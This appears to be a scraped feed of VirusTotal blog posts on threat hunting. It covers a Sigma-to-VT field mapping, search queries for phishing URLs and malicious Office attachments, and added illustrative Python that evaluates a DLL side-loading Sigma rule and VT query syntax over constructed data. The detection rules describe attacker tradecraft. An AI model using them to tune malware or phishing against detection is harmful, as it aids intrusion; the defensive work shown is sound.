style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].destination_ip</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].destination_port</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].smtp_from</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].smtp_to</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].message_from</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].message_to</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].message_cc</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].message_bcc</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].timestamp</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].subject</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].html_body</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].txt_body</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].x_mailer</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.tls</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">network_connection</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">DestinationHostname</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">DestinationIp</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">DestinationIsIpv6</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">DestinationPort</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">DestinationPortName</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourceIp</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourceIsIpv6</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourcePort</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourcePortName</span>
</p>
</td>
</tr>
<tr style="height: 37.5pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior (too generic)</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.modules_loaded</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">image_load</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ImageLoaded</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Image</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">OriginalFileName</span>
</p>
</td>
</tr>
</tbody>
</table>
</div>
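<div class="interval_12">As an added illustration (not VirusTotal's own matching code), the following Python applies the table's image_load row: a Sigma rule's <b>ImageLoaded</b> field is checked against the <b>modules_loaded</b> list of a behaviour report. The rule, the report excerpt and all helper names are constructed; the table also lists Image and OriginalFileName for this category, which the example leaves out.</div>

```python
"""Applying the table's Sigma-to-VT field mapping.  Added illustration, not
VirusTotal's matcher: a Sigma image_load rule's ImageLoaded field is checked
against the modules_loaded list of a behaviour report, per the row above.
The rule, the report excerpt and all helper names are constructed."""

# Sigma (Sysmon) field -> VT behaviour report key, from the image_load row.
FIELD_MAP = {"image_load": {"ImageLoaded": "modules_loaded"}}

# Constructed Sigma-style rule (detection section only): a DLL loaded from a
# user-writable location, a common DLL side-loading indicator, with a filter
# for a legitimate per-user application directory.
RULE = {
    "logsource": {"category": "image_load", "product": "windows"},
    "detection": {
        "selection": {
            "ImageLoaded|startswith": ["C:\\Users\\", "C:\\Windows\\Temp\\"],
            "ImageLoaded|endswith": ".dll",
        },
        "filter": {"ImageLoaded|contains": "\\Microsoft\\Teams\\"},
        "condition": "selection and not filter",
    },
}

# Constructed VT behaviour report excerpt (a real report has many more keys).
REPORT = {
    "modules_loaded": [
        "C:\\Windows\\System32\\kernel32.dll",
        "C:\\Users\\alice\\AppData\\Local\\Temp\\version.dll",
    ]
}


def value_matches(modifier, candidate, wanted):
    """Apply one Sigma string modifier; Sigma string matching is case-insensitive."""
    c, w = candidate.lower(), wanted.lower()
    if modifier == "startswith":
        return c.startswith(w)
    if modifier == "endswith":
        return c.endswith(w)
    if modifier == "contains":
        return w in c
    if modifier == "":
        return c == w
    raise ValueError("unsupported Sigma modifier: " + modifier)


def selection_hits(selection, category, report):
    """Report values satisfying every field of one Sigma selection.  Fields are
    ANDed and a list of values for a field is ORed, as in Sigma.  Every field of a
    selection must map to the same VT list (true for the image_load row)."""
    hits = None
    for spec, wanted in selection.items():
        field, _, modifier = spec.partition("|")
        key = FIELD_MAP[category][field]             # Sigma field -> VT report key
        values = wanted if isinstance(wanted, list) else [wanted]
        found = {c for c in report.get(key, [])
                 if any(value_matches(modifier, c, w) for w in values)}
        hits = found if hits is None else hits & found
    return hits or set()


def evaluate(rule, report):
    """Evaluate a 'selection' or 'selection and not filter' condition and return
    the report values that fired, so an analyst sees which module matched."""
    det, cat = rule["detection"], rule["logsource"]["category"]
    matched = selection_hits(det["selection"], cat, report)
    if det["condition"] == "selection and not filter":
        matched -= selection_hits(det["filter"], cat, report)
    elif det["condition"] != "selection":
        raise ValueError("unsupported condition: " + det["condition"])
    return sorted(matched)
```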
<h2 style="text-align: left;">Wrapping up
</h2>
<div class="interval_12"> At VirusTotal, we believe that the Sigma language is a valuable tool for the community to share information about samples’ behavior. Our objective is to make its use on VT as simple as possible. Adding macOS and Linux is just the start of what we are working on: we aim to add Sysmon for Linux to obtain more robust results, including the ability to download the full generated logs.
</div>
<div class="interval_12"> Remember that <a href="https://www.virustotal.com/ui/sigma_rules" target="_blank">here</a> you have a list of all the Crowdsourced Sigma rules that are currently deployed in VirusTotal and that you can use for threat hunting.
</div>
<div class="interval_12"> We hope you join our fan club of Sigma and VirusTotal, and as always <a href="https://www.virustotal.com/gui/contact-us" target="_blank">we are happy to hear your feedback.</a>
</div>
<div class="interval_12"> Happy Hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
.table-fields {
background: #86aaf9;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>Joseliyo Sánchezhttp://www.blogger.com/profile/15205592295367780978noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-69757649987163571282023-12-18T12:36:00.000+01:002023-12-18T12:36:04.878+01:00Protecting the perimeter with VT Intelligence - malicious URLs
<div class="interval_12">Please note that this blog post is part of our #VTMondays series; check out our collection of past publications <a href="https://blog.virustotal.com/2023/12/vtmondays-index.html" target="_blank">here</a>.</div>
<div class="interval_12">One of the main vectors attackers use for credential theft and malware deployment is the malicious link, whether it leads to an impersonated website or distributes malware directly. By studying malicious campaigns, defenders can learn attacker tactics and refine their defensive arsenal. They can also use suspicious URLs preemptively, updating deny lists and searching for any suspicious internal or perimeter activity.</div>
<div class="interval_12"><a href="https://www.virustotal.com/gui/home/search" target="_blank">VT Intelligence</a> provides a powerful toolset for this mission and can be used to improve URL filtering in your firewalls. We will now dive into a series of VT queries of progressively increasing complexity, dissecting the added modifiers at each step. Feel free to experiment with and refine these examples to build your own customized queries.</div>
<br>
<div class="interval_12">To begin, we search for URLs <b>(“entity:url”)</b> categorized as phishing according to the content category of their domain <b>(“category:phishing”)</b> or labeled as phishing by AntiVirus engines <b>(“engines:phishing”)</b>. We use the <b>“p”</b> modifier (“p” is short for “positives”, the number of engine detections) to discard benign URLs. In this case, we want URLs with more than 15 detections to avoid false positives; however, this threshold is completely at your discretion. Finally, we look for URLs first seen (<b>“fs”</b>, short for first submission) in the last 7 days <b>(7d+)</b>.
</div>
<div class="my-yara-code interval_12"><a href="https://www.virustotal.com/gui/search/entity%253Aurl%2520(category%253Aphishing%2520or%2520engines%253Aphishing)%2520p%253A15%252B%2520fs%253A7d%252B/urls" target="_blank">entity:url (category:phishing or engines:phishing) p:15+ fs:7d+</a></div>
<br />
<div class="interval_12">
The following query hunts for new malicious URLs submitted to VirusTotal in the last 7 days that distribute Microsoft Office documents or PDF files <b>(“tag:downloads-doc or tag:downloads-pdf”)</b>. We use the <b>“p”</b> modifier to keep only URLs with a high number of detections <b>(“p:15+”)</b>. Malicious URLs used for phishing commonly distribute these kinds of files to compromise the victim's system.
</div>
<div class="my-yara-code interval_12"><a href="https://www.virustotal.com/gui/search/entity%253Aurl%2520(tag%253Adownloads-doc%2520or%2520tag%253Adownloads-pdf)%2520p%253A15%252B%2520fs%253A7d%252B/urls" target="_blank">entity:url (tag:downloads-doc or tag:downloads-pdf) p:15+ fs:7d+</a></div>
<br />
<div class="interval_12">
Finally, we hunt for URLs impersonating a corporate service provider, such as Office 365. We use the <b>“url”</b> modifier to match substrings of the URL string <b>(“url:office365”)</b>. In this scenario, we want URLs that attackers built on WordPress <b>(“path:wp-content”)</b> to impersonate Office 365, filtered to those with at least 5 detections <b>(“p:5+”)</b>. Such malicious URLs impersonate legitimate service providers and commonly redirect users to another location after they have entered their credentials, typically the legitimate site, to avoid suspicion. We check for this behaviour with the <b>“have:redirects_to”</b> modifier.</div>
<div class="my-yara-code interval_12"><a href="https://www.virustotal.com/gui/search/entity%253Aurl%2520url%253Aoffice365%2520have%253Aredirects_to%2520path%253Awp-content%2520p%253A5%252B/urls" target="_blank">entity:url url:office365 have:redirects_to path:wp-content p:5+</a></div>
<br />
<div class="interval_12">You can learn more about URL search modifiers in the <a href="https://docs.virustotal.com/docs/url-search-modifiers" target="_blank">documentation</a>.</div>
<div class="interval_12">As always, we would like to <a href="http://virustotal.com/contact" target="_blank">hear from you</a>.</div>
<div class="interval_12">Happy hunting!</div>
Raimundo Alcázarhttp://www.blogger.com/profile/13300156415377228655noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-72458836671319172292023-12-11T18:41:00.000+01:002023-12-11T18:41:29.950+01:00Protecting the perimeter with VT Intelligence - Email security<div class="interval_12">Please note that this blogpost is part of our #VTMondays series, check out our collection of past publications <a href="https://blog.virustotal.com/2023/12/vtmondays-index.html" target="_blank">here.</a> </div>
<div class="interval_12">One of the most common attack vectors for gaining access to your network is phishing emails carrying malware-laden attachments, usually the first stage of a cyberattack kill chain. By gathering intelligence on the latest phishing campaigns targeting our country or industry, we can prevent emails with malicious attachments from reaching our company’s inboxes. This adds a security layer by reducing the burden on employees rather than relying solely on their intuition to identify threats.</div>
<div class="interval_12"> For this, we will use <a href="https://www.virustotal.com/gui/home/search" target="_blank">VT Intelligence</a> to hunt threats targeting our email gateway. Our approach starts with a simple example and gradually increases its complexity. For each VT Intelligence query we provide a detailed breakdown of the newly added modifiers. We encourage you to test the examples provided and to explore new queries further.</div>
<div class="interval_12">Our first basic query searches for documents <b>(“type:document”)</b> tagged as attachments <b>(“tag:attachment”)</b> and submitted from Spain <b>(“submitter:ES”)</b>. We use the <b>“p”</b> modifier (“p” is short for “positives”, the number of AntiVirus detections) to discard benign attachments. In this case, we want samples with more than 5 detections to avoid false positives; however, this threshold is completely at your discretion. Finally, we look for files first seen (<b>“fs”</b>, short for first submission) in the last 14 days <b>(14d+)</b>.</div>
<div class="my-yara-code interval_12"><a href="https://www.virustotal.com/gui/search/type%253Adocument%2520tag%253Aattachment%2520submitter%253AES%2520p%253A5%252B%2520fs%253A14d%252B/files" target="_blank">type:document tag:attachment submitter:ES p:5+ fs:14d+</a></div>
<br>
<div class="interval_12">Moving to the next stage, we explore the submissions modifier to identify large-scale attacks: here <b>“submissions:50”</b> sets the minimum number of submissions of a given file, which may flag a massive phishing campaign. We also use the name of an <b>AntiVirus engine</b> as a modifier to narrow the results down to potential blind spots. In this case, our strategy is to search for files flagged as “clean” by our AntiVirus but detected as malicious by at least 5 other engines.</div>
<div class="my-yara-code interval_12"><a href="https://www.virustotal.com/gui/search/type%253Adocument%2520tag%253Aattachment%2520p%253A5%252B%2520fs%253A14d%252B%2520AhnLab%253Aclean%2520submissions%253A50%252B/files" target="_blank">type:document tag:attachment p:5+ fs:14d+ AhnLab:clean submissions:50+</a></div>
<br>
<div class="interval_12">Finally, we build a slightly more complex condition by combining boolean operators such as <b>OR</b> and <b>NOT</b>. We search for specific document types, namely <b>docs and spreadsheets</b>, excluding other document types, and narrow the results to a particular suspicious dynamic behaviour, specifically actions associated with the early stages of an attack. In this example we search for Office documents that either execute <b>PowerShell</b> or <b>run macros that execute additional files</b> when detonated in the sandbox.</div>
<div class="my-yara-code interval_12"><a href="https://www.virustotal.com/gui/search/(type%253Adoc%2520or%2520type%253Adocx%2520or%2520type%253Axls%2520or%2520type%253Axlsx)%2520p%253A5%252B%2520fs%253A7d%252B%2520(behaviour%253Apowershell%2520or%2520(tag%253Amacros%2520and%2520tag%253Arun-file))/files" target="_blank">(type:doc or type:docx or type:xls or type:xlsx) p:5+ fs:7d+ (behaviour:powershell or (tag:macros and tag:run-file)) </a></div>
<br>
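<div class="interval_12">To make the modifier semantics used in this post and in the malicious-URLs post above concrete, here is an added Python evaluator (not VirusTotal code) that parses these queries and runs them over a small constructed corpus. It reads <b>N+</b> as "at least N", <b>Nd+</b> as "first seen within the last N days", <b>have:</b> as "field present", and an unrecognised modifier name as an AntiVirus engine verdict; the record field names and these readings are assumptions drawn from the posts' descriptions, and the real service decides what a modifier matches.</div>

```python
"""Evaluator for the VT Intelligence query syntax used in the two posts above.  Added
example, not VirusTotal code: record fields and modifier semantics ("N+" = at least N,
"7d+" = within the last 7 days) are a reading of the posts; the real service decides."""
from datetime import datetime, timedelta, timezone

NOW = datetime(2023, 12, 18, tzinfo=timezone.utc)          # constructed "today"

NUMERIC = {"p": "positives", "submissions": "submissions"}  # modifier -> record field
LIST = {"tag": "tags", "type": "types", "category": "categories",
        "engines": "engine_labels", "behaviour": "behaviour"}
SUBSTR = {"url": "url", "path": "path"}


def atom(tok):
    """Turn one 'modifier:value' token into a predicate over a record."""
    key, _, value = tok.partition(":")
    if not value:
        raise ValueError("bad modifier: " + tok)
    k, v = key.lower(), value.lower()
    if k in ("entity", "submitter"):                        # exact match
        return lambda rec: rec.get(k, "").lower() == v
    if k in NUMERIC:
        field, n, at_least = NUMERIC[k], int(v.rstrip("+")), v.endswith("+")
        return lambda rec: rec.get(field, 0) >= n if at_least else rec.get(field, 0) == n
    if k == "fs":                                           # first seen within N days
        since = NOW - timedelta(days=int(v.rstrip("d+")))
        return lambda rec: rec["first_submission"] >= since
    if k in LIST:
        return lambda rec: v in (x.lower() for x in rec.get(LIST[k], ()))
    if k in SUBSTR:
        return lambda rec: v in rec.get(SUBSTR[k], "").lower()
    if k == "have":                                         # field present and non-empty
        return lambda rec: bool(rec.get(v))
    # anything else is an antivirus engine name, e.g. AhnLab:clean
    return lambda rec: rec.get("engines", {}).get(key, "").lower() == v


class Query:
    """'or' binds loosest; adjacent terms are ANDed ('and' optional); 'not' and ( )."""

    def __init__(self, text):
        self.toks = text.replace("(", " ( ").replace(")", " ) ").split()
        self.pos = 0
        self.match = self._or()
        if self.pos != len(self.toks):
            raise ValueError("unexpected token: " + self.toks[self.pos])

    def _peek(self):
        return self.toks[self.pos].lower() if self.pos < len(self.toks) else None

    def _or(self):
        terms = [self._and()]
        while self._peek() == "or":
            self.pos += 1
            terms.append(self._and())
        return lambda rec: any(t(rec) for t in terms)

    def _and(self):
        terms = [self._unary()]
        while self._peek() not in (None, ")", "or"):
            if self._peek() == "and":
                self.pos += 1
            terms.append(self._unary())
        return lambda rec: all(t(rec) for t in terms)

    def _unary(self):
        tok = self.toks[self.pos]
        self.pos += 1
        if tok.lower() == "not":
            inner = self._unary()
            return lambda rec: not inner(rec)
        if tok == "(":
            inner = self._or()
            if self._peek() != ")":
                raise ValueError("missing ')'")
            self.pos += 1
            return inner
        return atom(tok)

    def search(self, records):
        """Ids of the records this query matches."""
        return [rec["id"] for rec in records if self.match(rec)]


CORPUS = [  # constructed sample records, not VirusTotal data (.invalid is a reserved TLD)
    {"id": "u1", "entity": "url", "url": "http://login-office365.invalid/wp-content/x/",
     "path": "/wp-content/x/", "positives": 9, "first_submission": NOW - timedelta(days=3),
     "categories": ["phishing"], "redirects_to": "https://legit-service.invalid/"},
    {"id": "u2", "entity": "url", "url": "http://invoice.invalid/d.pdf", "path": "/d.pdf",
     "positives": 22, "first_submission": NOW - timedelta(days=2), "tags": ["downloads-pdf"],
     "engine_labels": ["phishing"]},
    {"id": "f1", "entity": "file", "types": ["document", "docx"], "positives": 12,
     "first_submission": NOW - timedelta(days=4), "submissions": 120, "submitter": "US",
     "tags": ["attachment", "macros", "run-file"], "engines": {"AhnLab": "clean"}},
    {"id": "f2", "entity": "file", "types": ["document", "xls"], "positives": 6,
     "first_submission": NOW - timedelta(days=10), "submissions": 3, "submitter": "ES",
     "tags": ["attachment"], "behaviour": ["powershell"], "engines": {"AhnLab": "malicious"}},
]
```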
<div class="interval_12">You can learn more about file search modifiers in the <a href="https://docs.virustotal.com/docs/file-search-modifiers" target="_blank">documentation.</a></div>
<div class="interval_12">As always, we would like to <a href="https://virustotal.com/contact" target="_blank">hear from you.</a></div>
<div class="interval_12">Happy hunting! </div>
Pancho Perdomohttp://www.blogger.com/profile/09406313914317179794noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-12873062788204693532023-12-11T18:40:00.005+01:002023-12-29T12:20:08.908+01:00VTMondays<div style="text-align: left;"><span style="font-size: 18.6667px; white-space-collapse: preserve;"><b>Welcome to VTMondays! </b>A</span><span style="font-size: 18.6667px; white-space-collapse: preserve;"> weekly series of bite-sized educational pills exploring the use of VirusTotal in real-world scenarios. </span><span style="font-size: 18.6667px; white-space-collapse: preserve;">Here's what you'll get:</span></div><div style="text-align: left;"><ul style="text-align: left;"><li><span style="font-size: 18.6667px; white-space-collapse: preserve;"><b>Short lessons</b>: VTMondays are packed with valuable info in under 5 minutes read.</span></li><li><span style="font-size: 18.6667px; white-space-collapse: preserve;"><b>Real-world scenarios</b>: We're not talking theory, we're talking hunting malware, using intelligence to build up your defenses and staying ahead of the curve. </span></li><li><span style="font-size: 18.6667px; white-space-collapse: preserve;"><b>Actionable tips & best practices</b>: We'll equip you with practical hacks you can use right away. </span></li><li><span style="font-size: 18.6667px; white-space-collapse: preserve;"><b>Community connection</b>: Ask questions, share your experiences, and connect with other VirusTotal enthusiasts. </span></li></ul><span style="background-color: white; color: #202124; font-family: Roboto, arial, sans-serif; font-size: 13px; white-space-collapse: preserve;">Below you can find the link to the published and upcoming articles.</span><br /><div><ul style="text-align: left;">
<li><a href="https://blog.virustotal.com/2023/12/protecting-perimeter-with-vt.html">Threat detection - Email gateway</a> - 11th Dec</li>
<li><a href="https://blog.virustotal.com/2023/12/protecting-perimeter-with-vt_18.html">Threat detection - Malicious URLs</a> - 18th Dec</li>
<li><a href="https://blog.virustotal.com/2023/12/hunting-for-malicious-domains-with-vt.html">Threat detection - Malicious Domains</a> - 25th Dec</li>
<li><a href="https://blog.virustotal.com/2024/01/monitoring-malware-trends-with-vt.html">Threat detection - Monitoring malware trends </a> - 1st Jan</li>
